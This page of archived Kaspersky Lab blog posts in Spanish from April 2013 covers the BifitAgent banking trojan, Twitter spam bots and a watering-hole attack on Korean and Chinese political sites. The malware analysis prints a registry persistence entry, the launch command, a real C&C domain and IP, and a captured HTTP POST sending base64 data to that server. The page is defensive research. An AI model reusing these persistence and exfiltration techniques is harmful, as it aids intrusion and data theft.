El segmento de la funcionalidad de BIFIT_AGENT.JAR responsable de interceptar las transacciones bancarias que se realizan a traves de los sistemas BIFIT

El análisis de la funcionalidad incluida en BIFIT_AGENT.JAR demuestra que la principal función de los archivos JAR es falsear los datos utilizados en las transacciones bancarias realizadas desde los equipos infectados. Y todo esto es transparente para el usuario, ya que los datos que se falsean son los que se envían al banco, no los que ve el usuario. El uso de un token USB en la transacción no es ningún obstáculo para los atacantes, ya que el token firma la transacción sólo después de que los datos se han falseado.

Por desgracia, al momento de redactar este artículo ya no estaban disponibles los servidores de comando que devuelven los números de cuentas a los que se transfieren los fondos robados.

Firma

Una de las características particulares de Trojan-Banker.Win32.BifitAgent es que incluye una firma digital. Al momento de redactar este artículo (16 de abril de 2013), la colección de programas maliciosos de Kaspersky Lab incluía alrededor de 10 variantes del programa malicioso, todas con una firma válida emitida por Accurate CNC.


Firma digital de Trojan-Banker.Win32.BifitAgent

Accurate CNC es una compañía real. Cuenta con un sitio web (http://www.accuratecnc.com/) y ofrece equipos y software para el diseño de dispositivos electrónicos. Vale la pena remarcar que la versión pública de prueba de su programa, PhCNC Demo v3.26.4 está firmada con el mismo certificado que el programa malicioso.


Firma digital del programa CNC-s PhCNC Demo v3.26.4 de Accurate

En otras palabras, se trata de una firma digital robada que los ciberdelincuentes usan para firmar sus programas maliciosos.


Comparacion de los certificados usados por Trojan-Banker.Win32.BifitAgent y Accurate CNC-s PhCNC Demo v3.26.4

Nos pusimos en contacto con representantes de GlobalSign y el certificado se revocó.

Conclusión

Hemos detectado instalaciones de Trojan-Banker.Win32.BifitAgent en equipos que son parte de redes zombi creadas para utilizar programas maliciosos como Trojan.Win32.DNSChanger, Backdoor.Win32.Shiz, Virus.Win32.Sality, etc. No hemos detectado ninguna propagación mediante exploits.

A partir de la selectividad de las infecciones, podemos deducir que los ciberdelincuentes venden equipos infectados en los cuales otros delincuentes detectan sistemas bancarios BIFIT y proceden a instalar Trojan-Banker.Win32.BifitAgent en dichos equipos.

Según los datos proporcionados por KSN, unos 100 usuarios de Kaspersky Lab han sido víctima de ataques de programas maliciosos desde principios de abril. Vale la pena notar que la cantidad de ataques por usuario crece día a día.

En resumen, los ciberdelincuentes se aprovechan de la arquitectura de los programas maliciosos, del certificado robado y del carácter dirigido de los ataques para poco a poco aumentar el número de usuarios infectados. Con lo cual, las cuentas bancarias de los ciberdelincuentes crecen.

¿Es el marketing digital el nuevo spam?


  Vicente Diaz       23 abril 2013 | 17:19  MSK

Comentar  
¡Qué semana la que se vivió en Boston! Me encontraba camino a Source Conference el mismo día del atentado. Resulta difícil describir las intensas emociones que sentí cuando llegué. Como el presidente Obama dijo hoy a los ciudadanos de Boston: “Volveréis a correr". Yo os deseo lo mejor, sed fuertes.

En mi presentación en Source Conference me referí a los fraudes en Twitter, pues estos días hemos detectado muchos bots de spam en esta red social, tanto los que envían secretamente mensajes no deseados a otros usuarios, como aquellos que realizan análisis semánticos previos, dependiendo del texto de los tweets, a fin de lograr un mensaje más enfocado.

Twitter suele identificar y neutralizar con facilidad estos bots, pero ellos también se reproducen con la misma facilidad. Para una determinada campaña de spam con contenido pornográfico con más de 5.000 bots activos, se estaban creando 250 nuevos por día. Para algunas campañas, la vida media de los perfiles fraudulentos es de apenas 45 minutos. Estos bots obviamente perjudican a los usuarios y a la misma red social. Es curioso que muchas compañías ofrecen este servicio como “publicidad social digital”. Podemos ver cómo los mismos perfiles se rehúsan de forma regular, cambiando la descripción del perfil y la foto, con el fin de burlar las medidas de seguridad y adaptarse a la nueva campaña:
Varios bots usan esta foto de perfil:


Y estos son los mismos bots una semana despues:




Muchos bots usan un diccionario común para los tweets que envían, además de los mensajes spam, con el fin de camuflarse como perfiles legítimos. Pero esto facilita su detección, por lo que tienen que implementar nuevos artilugios para evitar la detección del análisis semántico, como mensajes aleatorios con palabras que este análisis suele ignorar. Estos son algunos ejemplos:

  • pero mi tú o estar encontrar yo era que y somos hablar tema
  • tener sin poder yo ellos en su dentro bajo
  • y sin e tu para de tener o todos uno antes encontrar nosotros

Algunas de estas campañas no se limitan sólo a Twitter, sino que están afectando a varias redes sociales, incluso a Facebook. Por ejemplo, la campaña job-deals.com (activa desde principios de abril) ataca principalmente a Twitter, pero podemos ver en los sitios Upstream y Downstream, según Alexa, la forma en que los usuarios de Facebook resultaron afectados:

Estos bots no sólo incomodan a los usuarios, sino que además representan una verdadera amenaza cuando se los usa para enviar otras cosas además de spam. Lo que resulta más preocupante es que muchas veces se usan con cuentas hackeadas, lo que incrementa notablemente la posibilidad de que los destinatarios activen el enlace ya que suponen que el remitente es un amigo. Podemos ver cómo una reciente campaña empleó esta técnica para capturar cuentas con este increíble mensaje original: “Jajaja, qué divertida tu foto”, seguido del enlace hacia el sitio malicioso:

Para esta campaña se usaron varios dominios, y volvemos a notar que algunos de ellos también se encontraban en otras redes sociales:

Hay mucho más fraude en las redes sociales, como cuando se usa Twitter para propagar malware, para establecer comunicaciones con programas maliciosos, o para los intereses de hacktivistas, como ha ocurrido recientemente en las elecciones venezolanas:

Hay mucho más fraude en las redes sociales, como cuando se usa Twitter para propagar malware, para establecer comunicaciones con programas maliciosos, o para los intereses de hacktivistas, como ha ocurrido recientemente en las elecciones venezolanas:


Hay mucho más por discutir, pero quizás sea suficiente por ahora. Sin embargo, si te interesa este tema y quieres saber cómo utilizar el aprendizaje automático para detectar estos perfiles maliciosos, te invito a ver mi presentación (en inglés):

Birds, Bots and Machines - fraud in Twitter and machine learning por vicenteDiaz_KL


Emboscada para coreanos peculiares


  Dmitry Tarakanov       22 abril 2013 | 14:29  MSK

Comentar  
Mientras investigábamos la propagación de PlugX mediante exploits para Java, nos topamos con un sitio infectado que contenía un applet malicioso para Java dirigido a la vulnerabilidad CVE 2013-0422. Este applet malicioso para Java se detectó de forma heurística, con veredicto genérico para esa vulnerabilidad, y hubiese sido casi imposible encontrar ese particular sitio entre miles de otros en los que se detectaron aplicaciones maliciosas para Java mediante el veredicto genérico. Sin embargo, en aquel momento llevábamos a cabo una investigación específica que ayudó a que este sitio apareciera en las estadísticas de unos cuantos resultados de búsqueda. Bueno, en honor a la verdad, se trató de un falso positivo en cuanto al criterio de búsqueda, pero en este caso fue un error con suerte.

El sitio malicioso era un recurso de Internet llamado – minjok.com y resultó ser un sitio de noticias en inglés y en coreano, que cubría especialmente los acontecimientos políticos en la península coreana. Nos pusimos en contacto con el encargado del sitio para advertirle sobre la infección, y aunque no recibimos respuesta, el sitio se cerró poco después.
Así se describe minjok.com en http://www.northkoreatech.org/the-north-korean-website-list/minjok-tongshin/:



Descripcion de minjok.com

El responsable de Minjok-Tongshin es un coreano-americano llamado “Ken Kilnam Roh” que, aparentemente, vive en California, y que busca la reunificación de las dos Coreas y quiere ver unidos y felices a todos los coreanos y que vivan como una sola nación. Por desgracia, no existe una solución sencilla que satisfaga a ambas partes, y más bien, cada una está vigilante con lo que sucede en la otra. Ya podemos imaginarnos los temas de cobertura en este sitio de noticias y el tipo de lectores interesados en sus contenidos; los temas son delicados y su público son coreanos políticamente activos. Y este sitio es perfecto para lanzar ataques del tipo "watering hole" si uno quiere saber qué es lo que piensan los activistas coreanos o incluso lo que pretenden hacer respecto a la compleja situación entre Corea del Norte y Corea del Sur. Y esto es exactamente lo que alguien hizo.

Sitio infectado

El sitio se infectó y los ciberatacantes añadieron una sola línea en un código de una página que mostraba las noticias más candentes sobre la península coreana.



Applet malicioso inyectado

HKCU\Software\Microsoft\Windows\CurrentVersion\Run

bspire = ?%systemdrive%:\Temp\agentm.exe BSPIRE

Esta línea de código obligaba al navegador del visitante a descargar y ejecutar el applet malicioso para Java alojado en el sitio. Si tenía éxito, se descargaba un archivo ejecutable malicioso en el equipo de la víctima y se ejecutaba sin que ella se entere. Este archivo ejecutable también se alojaba en el sitio infectado, con su nombre camuflado como imagen GIF.

El archivo ejecutable es un programa malicioso que actúa como un sencillo descargador e instalador para la próxima etapa del ataque. Primero crea la carpeta “%systemdrive%:\Temp” y guarda en ella un archivo llamado "agentm.exe". También crea el siguiente valor de registro:

cmd.exe /c dir c:\windows & cmd.exe /c for /f %a in ('dir /a /s /b %systemdrive%\temp\agentm.exe') do (%a BSPIRE)


para asegurarse de que en la siguiente etapa “agentm.exe” se ejecute cada vez que el sistema operativo arranque. Y, por supuesto, el archivo “agentm.exe” se inicia inmediatamente después de la instalación mediante el siguiente comando de ejecución:
cmd.exe /cdirc:\windows & cmd.exe /c for /f %a in ('dir /a /s /b %systemdrive%\temp\agentm.exe') do (%a BSPIRE)



Proceso infeccioso

Agentm.exe es un troyano puerta trasera que se conecta con el siguiente servidor de comando y control: mailsgoogle.com. Este servidor de comando y control responde a la dirección IP 146.0.79.133 en Holanda, pero se trata de un servidor dedicado que una firma de telecomunicaciones rusa ofrece en alquiler Hostkey. El dominio del servidor de control y comando, mailsgoogle.com, se registró en diciembre de 2012 con la dirección richard.blosser@aol.com.



Datos de registro de mailsgoogle.com


Para que funcione como se pretende, el troyano puerta trasera debe ejecutarse con el argumento “BSPIRE”. Si el programa se ejecuta sin el argumento correcto, calcula los siguientes nombres de proceso para buscar entre los procesos en ejecución:

XxXlorer.exe en caso de ausencia de argumentos;
XxXlorer.exe en caso de que exista un argumento pero que no sea “BSPIRE”;

Si el argumento es “BSPIRE”, genera el nombre de proceso “explorer.exe”, al cual se inyecta.

Un rasgo notable de este programa malicioso es que forma hilos de texto byte-por-byte a lo largo de toda su extensión:



Construccion de hilos por caracteres

Esta no es una técnica inusual, pero este programa malicioso la usa de una manera bastante exagerada, obviamente con fines de ofuscamiento.
Una vez que “explorer.exe” se localiza en la memoria, el agente inyecta una parte de sí mismo en el proceso y de forma remota inicia un hilo de su código en el contexto de “explorer.exe”. Este hilo realiza todas las principales tareas del programa malicioso. Aunque el programa malicioso está configurado para ejecutarse sólo una vez cuando arranca el sistema operativo, después de que se inyecta en "explorer.exe"” crea un mutex con el nombre WIN32_BLACKSPIRE_02 para evitar ejecutarse repetidamente al mismo tiempo.

El troyano puerta trasera se conecta al servidor de control y comando mediante peticiones HTTP GET:

mailsgoogle.com/bbs/board.php?bincode=

El hilo codificado contiene la fecha y la hora de la ejecución del agente inicial, por ejemplo: [2013-04-15 13h00m00s334]. Este dato y la URL para conectarse al servidor de control y comando se destinan al archivo llamado "%systemdrive%\Temp\passing.dat" que el agente inicial guarda. Posteriormente, el código inyectado desde "explorer.exe" lee el archivo, lo que le permite al autor del programa malicioso migrar los datos de uno a otro componente del programa malicioso.

El troyano puerta trasera es bastante sencillo: realiza sólo dos acciones mediante comandos desde el servidor de control y comando: descarga para que se ejecute y se autodesinstale una Dynamic Link Library. Si el servidor de control y comando envía una DLL, el troyano puerta trasera la guarda con el nombre "winnt32x.dll" en la carpeta temporal del sistema; después la carga con LoadLibraryA y llama a la función de exportación de la biblioteca run. Cuando la función run termina de ejecutarse, la bilioteca se descarga y se elimina el archivo “winnt32x.dll”.

The C&C doesn’t send additional libraries to an infected machine instantly; attackers push them when they explore what the computer has been netted.El servidor de control y comando no envía al instante bibliotecas adicionales al equipo infectado; los atacantes las envían cuando verifican que el equipo se ha incorporado a la red.

Esto refleja que se trata de un ataque dirigido. Durante nuestra investigación, observamos que después de un tiempo los atacantes cargaron dos tipos de bibliotecas. Varias bibliotecas del primer tipo no eran más que envolturas del comandodiren el equipo infectado con diferentes rutas para mostrar locaciones codificadas por contenido en el cuerpo de las DLLs. El segundo tipo era un ejecutor de otra utilidad de la línea de comandos: systeminfo. Estas bibliotecas envían comandos al archivo creado con la fecha y hora de ejecución en su nombre de archivo, por ejemplo:
[2013-04-16 11H01M19S000]_TYPE02

en la carpeta temporal del sistema. Entonces el envío se lee desde este archivo y se envía al servidor de control y comando codificado con BASE64. Este es un ejemplo de dicho envío:

POST /bbs/board.php?bincode=WzIwMTMtMDQtMTUgMTRoMDVtMzZzNTcxXQ==&opcode=true&rscode=WzIwMTMtMDQtMTYgMDRoMDRtMDRzNjA5XV90eXBlMDI= HTTP/1.1
Content-Type: multipart/form-data, boundary=mm1777multi3333headr
Host: mailsgoogle.com
Content-Length: 838
Connection: Keep-Alive

--mm1777multi3333headr
Content-Disposition: form-data; name="file"; filename=WzIwMTMtMDQtMTYgMDRoMDRtMDRzNjA5XV90eXBlMDI=

//4gAFYAb [snip] AA0ACgA=
--mm1777multi3333headr?

En total, los ciberatacantes cargaron cuatro bibliotecas para que ejecuten los siguientes comandos:

cmd /c dir %appdata%
cmd /c dir c:\
cmd /c dir d:\
cmd /c systeminfo

Tras darse cuenta de que el sistema operativo no pertenecía a ninguna persona real (después de todo, era una máquina virtual de pruebas con un mínimo de recursos), los ciberdelincuentes perdieron interés y no hicieron más desde entonces.
Detectamos el programa malicioso referido con los siguientes veredictos:

Java app: javaupdates.jar (0x9d8e935ef2c509ea30df1bd88127cc34) - Exploit.Java.CVE-2013-0422.z
Dropper: images.gif (0xcd2690c325e9ca17cd99ba6b76a9fa25) - Backdoor.Win32.Agent.dboe
Agent: agentm.exe (0xaaf79582e81e4fdc340865650d9c74a6) - Backdoor.Win32.Agent.dboe

Curiosamente, se ha detectado el mismo exploit con la carga ejecutable alojado en forum.beijingshots.com. Por ejemplo, una sección del foro se autodescribe como una plataforma para conversar de forma gratuita; otra está dedicada a los derechos humanos. En general, se trata de un sitio en la Web en el que se discuten distintos aspectos, incluso políticos, pero en este caso sobre China. Recomendamos fervientemente a nuestros lectores que no visiten este recurso pues sigue infectado.
Según nuestros datos estadísticos, pocos usuarios han llegado a tocar estos recursos con intenciones maliciosas, la mayoría de los cuales está en EE.UU., Perú, Tailandia y Alemania.

Tomando en cuenta la forma en la que actuaron los atacantes, estamos seguros que se trata de ataques del tipo "watering hole" contra activistas coreanos y chinos. En este momento, no contamos con suficientes datos para señalar con exactitud al responsable de estos ataques. Y es probable que esto sea sólo una parte de una campaña de amplio alcance.

Sin embargo, quienquiera que sea el responsable y cualquiera que sea el alcance de los ataques, todos los usuarios que suelen visitar sitios de noticias sobre los sucesos políticos en Corea (y sobre activistas chinos) deberían tomar precauciones puesto que alguien los tiene en la mira en esta sucia cacería.
Page Top  |  Archivo >>

 

Copyright © 1996 - 2013
Kaspersky Lab
Todos los derechos reservados

Correo electrónico: webmaster@viruslist.com